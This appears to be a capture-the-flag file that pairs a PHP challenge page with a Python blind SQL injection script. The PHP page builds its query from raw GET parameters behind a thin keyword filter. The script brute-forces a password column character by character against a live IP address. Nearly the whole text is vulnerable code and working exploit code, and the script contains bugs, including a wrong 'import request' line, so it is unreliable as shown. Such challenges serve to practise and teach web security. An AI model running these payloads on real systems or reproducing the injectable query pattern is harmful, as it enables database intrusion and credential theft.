[H3XOR]column test

/*
 *      if you see the password column name,
 *      you will get the flag~!
 *
 */

include("./dbconfig.php");
$id = $_GET['id'];
$pw = $_GET['pw'];

if ( isset($id) || isset($pw) ) {
    if (preg_match("/info|sche|,/i", $id))
        exit("no hack ~_~");
    if (preg_match("/info|sche/i", $pw))
        exit("no hack ~_~");

    $query = "SELECT {$pw_column_name}, {$id_column_name} FROM {$table} WHERE {$id_column_name}='{$id}' AND {$pw_column_name}='{$pw}'";
    $result = mysqli_fetch_array(mysqli_query($conn ,$query));

    if ($result['id']) {
        echo "Hello {$result['id']}";
    } else {
        echo "DB error";
    }
} else {
    highlight_file(__FILE__);
}

import request
def hexor():
	param={'id':"123' union select 2,",'pw':"#"}
	password=''
	for ind in range(1,10):
		p=0
		for x in range(7,-1,-1):
			param={'id':"123' or ascii(substr(",'pw':",{},1))<{}#".format(ind,p+2**x)}
			res=requests.get('http://13.124.1.51/web/prob15/?id=info',params=param).text
			if 'Hello guest' not in res:
				p+=2**x
		#print p
			print res
			#time.sleep(10000)
		print p
		print '[**]'+chr(p)
		password+=chr(p)
		print 'password: '+password
		
hexor()